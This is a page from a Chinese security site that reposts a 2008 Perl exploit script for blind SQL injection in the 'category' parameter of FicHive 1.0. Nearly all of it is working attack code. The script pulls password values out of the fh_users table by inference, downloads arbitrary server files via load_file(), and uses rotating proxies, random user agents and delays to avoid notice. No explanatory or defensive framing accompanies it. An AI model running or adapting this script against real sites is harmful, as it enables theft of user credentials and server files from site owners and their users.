首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FicHive 1.0 (category) Remote Blind SQL Injection Exploit
来源:www.vfcocus.net 作者:His0k4 发布时间:2008-05-19  
#!/usr/bin/perl
#Usage: ./test.pl -url "http://localhost/[script_path]/index.php?go=Fiction&category=<valide_id>
#############################################################################
use LWP::UserAgent;
use Getopt::Long;
use IO::Handle;
use strict;
$| = 1;


###############################################################################
my $default_debug = 0;
my $default_length = 13;
my $default_method = "GET";
my $default_time = 0;
my $version = "1.1";
my $default_useragent = "bsqlbf $version";
my $default_dict = "dict.txt";
my $default_sql = "fh_users.upass";
my $default_blind ="category";
my $default_match ="Genre: All/Genre:";
###############################################################################


$| = 1;

my ($args, $abc, $solution);
my ($string, $char, @dic);
my (%vars, @varsb);
my ($lastvar, $lastval);
my ($scheme, $authority, $path, $query, $fragment);
my $hits = 0;
my $usedict = 0;
my $amatch = 0;
my ($ua,$req);

###############################################################################
# Define GetOpt:
my ($url, $sql, $time, $rtime, $match, $uagent, $charset, $debug);
my ($proxy, $proxy_user, $proxy_pass,$rproxy, $ruagent);
my ($dict, $start, $length, $method, $cookie,$blind);
my ($help, $bincharset, $get, $nodict);

my $options = GetOptions (
  'help!'            => \$help,
  'url=s'            => \$url,
  'get=s'            => \$get,
  'sql=s'            => \$sql,
  'blind=s'          => \$blind,
  'match=s'          => \$match,
  'charset=s'        => \$charset,
  'start=s'          => \$start,
  'length=s'         => \$length,
  'dict=s'           => \$dict,
  'method=s'      => \$method,
  'uagent=s'      => \$uagent,
  'ruagent=s'      => \$ruagent,
  'cookie=s'      => \$cookie,
  'proxy=s'          => \$proxy,
  'proxy_user=s'     => \$proxy_user,
  'proxy_pass=s'     => \$proxy_pass,
  'rproxy=s'         => \$rproxy,
  'debug!'           => \$debug,
  'rtime=s'          => \$rtime,
  'time=i'           => \$time );

&help unless ($url);
&help if $help eq 1;

#########################################################################
# Default Options.
$abc              = charset();
$uagent         ||= $default_useragent;
$debug          ||= $default_debug;
$length         ||= $default_length;
$solution       ||= $start;
$method         ||= $default_method;
$sql            ||= $default_sql;
$time           ||= $default_time;
$blind          ||= $default_blind;
$match          ||= $default_match;


&createlwp();
&parseurl();

if ( ! defined($blind)) {
$lastvar = $varsb[$#varsb];
$lastval = $vars{$lastvar};
} else {
$lastvar = $blind;
$lastval = $vars{$blind};
}

if (defined($cookie)) { &cookie() }



&banner();
&httpintro();



if ( ! $get) { &sqlget() } else { &fileget() }


sub fileget {
#ord(MID(compress(load_file(0xfilename)),1,1))
$get =~ m,.*/(.*),;
my $lget = $1;
my $rsize = $start + 1;
if (-e "$lget" && ! $start) {
$rsize = -s "$lget";
print "Error: file ./$lget exists.\n";
print "You can erase or resume it with: -start $rsize\n";
exit 1
}
my ($fstr,$i);
my $fsize = "";
$fstr = unpack("H*","$get");
# GET size of file.
$abc = "0123456789";
for ($i=1;$i<=15;$i++) {
my $furl;
my $find = 0;
foreach (split/ */,$abc) {
$find = 0;
$char = ord();
$string = " and mid(length(load_file(0x$fstr)),$i,1)=char($char)";
if (lc($method) eq "post") {
$vars{$lastvar} = $lastval . $string;
}
$furl = $url;
$furl =~ s/($lastvar=$lastval)/$1$string/;
&createlwp if $rproxy || $ruagent;
my $html=fetch("$furl");
$hits++;
    foreach (split(/\n/,$html)) {
if (/\Q$match\E/) {
    my $asc=chr($char);
    $fsize .= $asc;
    $find = 1;
}
last if $find == 1;
   }
last if $find == 1;
}
last if $find == 0;
}
if ($fsize < "1") { print "Error: file not found, no permissions or ... who knows\n"; exit 1 }
# starting ..
$length = "$fsize bytes";
$abc = "getfile [256]";
$sql = "load_file($get)";
&bsqlintro();
# Get file
open FILE, ">>$lget";
FILE->autoflush(1);
print "\n--- BEGIN ---\n";
my ($i,$b,$fcontent);
$rsize = 1 if $rsize < 1;
for ($i=$rsize;$i<=$fsize+1;$i++) {
my $find = 0;
my ($furl, $b_start, $b_end, $z);
for ($z=0;$z<272;$z+=16) {
my $zz = $z + 16;
$string = " and ord(mid(load_file(0x$fstr),$i,1))>=$z and ord(mid(load_file(0x$fstr),$i,1))<=$zz";
if (lc($method) eq "post") {
$vars{$lastvar} = $lastval . $string;
}
$furl = $url;
$furl =~ s/($lastvar=$lastval)/$1$string/;
&createlwp if $rproxy || $ruagent;
my $html=fetch("$furl");
$hits++;
foreach (split(/\n/,$html)) {
if (/\Q$match\E/) {
$b_start = $z;
$b_end = $z + 16;
$find = 1;
}
last if $find == 1;
   }
last if $find == 1;
}
print "$fcontent";
for ($b=$b_start;$b<=$b_end;$b++) {
$find = 0;
$string = " and mid(load_file(0x$fstr),$i,1)=char($b)";
if (lc($method) eq "post") {
$vars{$lastvar} = $lastval . $string;
}
$furl = $url;
$furl =~ s/($lastvar=$lastval)/$1$string/;
&createlwp if $rproxy || $ruagent;
my $html=fetch("$furl");
$hits++;
    foreach (split(/\n/,$html)) {
if (/\Q$match\E/) {
    $fcontent = pack("C*","$b");
       print FILE "$fcontent";
    $find = 1;
}
last if $find == 1;
   }
last if $find == 1;
}
}
print "\n--- END ---\n";
        close FILE;
$solution = "success";
}



sub sqlget {
&bsqlintro();
$dict ||= $default_dict;
open DICT,"$dict";  @dic=<DICT>; close DICT;
my $i;
$nodict = 0;
for ($i=length($start)+1;$i<=$length;$i++) {
my $furl;
my $find = 0;
$abc = charset();
&bsqlintro if $debug == 1;
   print "\r trying: $solution ";
foreach (split/ */,$abc) {
$find = 0;
$char = ord();
$string = " AND MID($sql,$i,1)=CHAR($char)";
    if (lc($method) eq "post") {
   $vars{$lastvar} = $lastval . $string;
}
    print "\x08$_";
$furl = $url;
$furl =~ s/($lastvar=$lastval)/$1$string/;
&createlwp if $rproxy || $ruagent;
my $html=fetch("$furl");
$hits++;
    foreach (split(/\n/,$html)) {
if (/\Q$match\E/) {
    my $asc=chr($char);
    $solution .= $asc;
    $find = 1;
}
last if $find == 1;
   }
last if $find == 1;
}
if ($usedict ne 0 && $find eq 0) { $nodict=1; $i--; }
if ($find eq "0" && $usedict eq "0") { last; };
}
}

&result();

#########################################################################
sub httpintro {
my ($strcookie, $strproxy, $struagent, $strtime, $i);


if ($ruagent) { $struagent="rnd.file:$ruagent" } else { $struagent = $uagent }


foreach (keys %vars) {
$i++;

}
if (! $cookie) { $strcookie="(null)" } else { $strcookie = $cookie; }

if (! $proxy && !$rproxy) { $strproxy="(null)" } else { $strproxy = $proxy; }
if ($rproxy) { $strproxy = "rnd.file:$rproxy" }

if (! $proxy_user) { $strproxy="(null)" } else { $strproxy = $proxy_user; }
# timing
if (! $time && !$rtime) { $strtime="0sec (default)" }
if ( $time == 0) { $strtime="0 sec (default)" }
if ( $time == 1) { $strtime="15 secs" }
if ( $time == 2) { $strtime="5 mins" }
if ($rtime) { $strtime = "rnd.time:$rtime" }

}

sub bsqlintro {
my ($strstart, $strblind, $strlen, $strmatch, $strsql);

if ($blind eq $default_blind) { $strsql = "$blind (default)"; } else { $strblind = $blind; }
if (! $blind) { $strblind = "(last) $lastvar"; } else { $strblind = $blind; }

if ($length eq $default_length) { $strlen = "$length (default)" } else { $strlen = $length; }
if ($sql eq $default_sql) { $strsql = "$sql (default)"; } else { $strsql = $sql; }


if ($match eq $default_match) { $strmatch = "$match" } else { $strmatch = "$match"; }
#printf ("%12s %-60s\n","$strmatch",$match);

print "-"x80; print "\n\n";
}

#########################################################################

sub createlwp {
my $proxyc;
&getproxy;
&getuagent if $ruagent;
LWP::Debug::level('+') if $debug gt 3;
$ua = new LWP::UserAgent(
        cookie_jar=> { file => "$$.cookie" });
$ua->agent("$uagent");
if (defined($proxy_user) && defined($proxy_pass)) {
my ($pscheme, $pauthority, $ppath, $pquery, $pfragment) =
$proxy =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
$proxyc = $pscheme."://".$proxy_user.":".$proxy_pass."@".$pauthority;
} else { $proxyc = $proxy; }

$ua->proxy(['http'] => $proxyc) if $proxy;
undef $proxy if $rproxy;
undef $uagent if $ruagent;
}

sub cookie {
# Cookies check
if ($cookie || $cookie =~ /; /) {
foreach my $c (split /;/, $cookie) {
my ($a,$b) = split /=/, $c;
if ( ! $a || ! $b ) { die "Wrong cookie value. Use -h for help\n"; }
}
}
}

sub parseurl {
###############################################################################
# Official Regexp to parse URI. Thank you somebody.
($scheme, $authority, $path, $query, $fragment) =
$url =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
# Parse args of URI into %vars and @varsb.
foreach my $varval (split /&/, $query) {
my ($var, $val) = split /=/, $varval;
$vars{$var} = $val;
push(@varsb, $var);
}
}

# Define CHARSET to use. Dictionary /// (TODO: fix ugly code)
sub charset {
if ($hits ne 0 && $nodict eq 0) {
my (%tmp,@b,$foo); undef %tmp; undef @b; undef $abc;
foreach my $line (@dic) {
chomp $line;
   if ($line =~ /\Q$solution\E/ && $line !~ /^#/) {
$foo = $line; $foo =~ s/\Q$solution\E//;
foreach ((split/ */,$foo)) {
  if ($tmp{$_} ne "1" ) {
$tmp{$_} = "1"; push (@b,$_);
}
}
}
}
   if ($#b >= 0) {
foreach my $c (@b) { $abc .=$c;}
$usedict = $abc;
print "\nUsing a dictionary with this charset: $abc\n" if $debug == 1;
} else {
$abc = chardefault()
}
} else {
$abc = chardefault()
}
return $abc;
}

sub chardefault {
my $tmp;
$abc = $charset;
if (lc($charset) eq "md5") {
$abc = "abcdef0123456789\$.";
} elsif (lc($charset) eq "num") {
$abc = "0123456789";
} elsif (lc($charset) eq "all" || ! $charset) {
   $abc = "abcdefghijklmnopqrstuvwxyz0123456789\$.:-_()[]{}º@=/\\|#?¿&·!<>ñÑ";
}
# If a dictionary has been used before, remove chars from current charset
if ($usedict ne 0) {
foreach (split(/ */, $usedict)) {
$abc =~ s/$_//;
}
}
$usedict = 0;
return $abc;
}

sub auto_match {
  $match = fmatch("$url");
}


#########################################################################
# Show options at running:
sub banner {
print "\n // FicHive v1.0 Blind SQL injection (bsqlbf tool modified)\n";
print " // Author:His0k4\n // Contact:his0k4.hlm[at]gmail.com\n\n";
}


#########################################################################
# Get differences in HTML
sub fmatch {
my ($ok,$rtrn);
my ($furla, $furlb) = ($_[0], $_[0]);
my ($html_a, $html_b);
if (lc($method) eq "get") {
$furla =~ s/($lastvar=$lastval)/$1 AND 1=1/;
$furlb =~ s/($lastvar=$lastval)/$1 AND 1=0/;
$html_a = fetch("$furla");
$html_b = fetch("$furlb");
} elsif (lc($method) eq "post") {
   $vars{$lastvar} = $lastval . " AND 1=1";
   $html_a = fetch("$furla");
   $vars{$lastvar} = $lastval . " AND 1=0";
   $html_b = fetch("$furla");
   $vars{$lastvar} = $lastval;
}
my @h_a = split(/\n/,$html_a);
my @h_b = split(/\n/,$html_b);
foreach my $a (@h_a) {
$ok = 0;
if ($a =~ /\w/) {
   foreach (@h_b) {
    if ($a eq $_) {$ok = 1; }
}
} else { $ok = 1; }
   $rtrn = $a;
   last if $ok ne 1;
}
return $rtrn;
}


#########################################################################
# Fetch HTML from WWW
sub fetch {
my $secs;
if ($time == 0) { $secs = 0 }
elsif ($time == 1) { $secs = 15 }
elsif ($time == 2) { $secs = 300 }
if ($rtime =~ /\d*-\d*/ && $time == 0) {
my ($l,$p) = $rtime =~ m/(\d+-\d+)/;
srand; $secs = int(rand($p-$l+1))+$l;
} elsif ($rtime =~ /\d*-\d*/ && $time != 0) {
print "You can't run with -time and -rtime. See -help.\n";
exit 1;
}
sleep $secs;

my $res;
if (lc($method) eq "get") {
my $fetch = $_[0];
if ($cookie) {
$res = $ua->get("$fetch", Cookie => "$cookie");
} elsif (!$cookie) {
$res = $ua->get("$fetch");
}
} elsif (lc($method) eq "post") {
my($s, $a, $p, $q, $f) =
      $url=~m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
my $fetch = "$s://$a".$p;
if ($cookie) {
    $res = $ua->post("$fetch",\%vars, Cookie => "$cookie");
} elsif (!$cookie) {
    $res = $ua->post("$fetch",\%vars);
}
} else {
die "Wrong httpd method. Use -h for help\n";
}
my $html = $res->content();
return $html;
}


sub getproxy {
if ($rproxy && $proxy !~ /http/) {
my @lproxy;
open PROXY, $rproxy or die "Can't open file: $rproxy\n";
while(<PROXY>) { push(@lproxy,$_) if ! /^#/ }
close PROXY;
srand; my $ind = rand @lproxy;
$proxy = $lproxy[$ind];
} elsif ($rproxy && $proxy =~ /http/)  {
print "You can't run with -proxy and -rproxy. See -help.\n";
exit 1;
}
}

sub getuagent {
my @uproxy;
open UAGENT, $ruagent or die "Can't open file: $ruagent\n";
while(<UAGENT>) { push(@uproxy,$_) if ! /^#/ }
close UAGENT;
srand; my $ind = rand @uproxy;
$uagent = $uproxy[$ind];
chop($uagent);
}

sub result {
print "\r results:                                  \n" .
" $sql = $solution\n" if length($solution) > 0;
print " total hits: $hits\n";
}


sub help {
&banner();
print " usage: $0 -url http://localhost/path/index.php?go=Fiction&category=<id>\n";
    exit(1);
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Archangel Weblog 0.90.02 (post
·Smeego 1.0 (Cookie lang) Local
·Debian OpenSSL Predictable PRN
·LulieBlog 1.2 Multiple Remote
·Dedecms getip()的漏洞利用
·MeltingIce File System <= 1.0
·PHP AGTC-Membership System <=
·Pet Grooming Management System
·MyPicGallery 1.0 Arbitrary Add
·Symantec Altiris Client Servic
·AlkalinePHP <= 0.80.00 beta (t
·Debian OpenSSL Predictable PRN
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved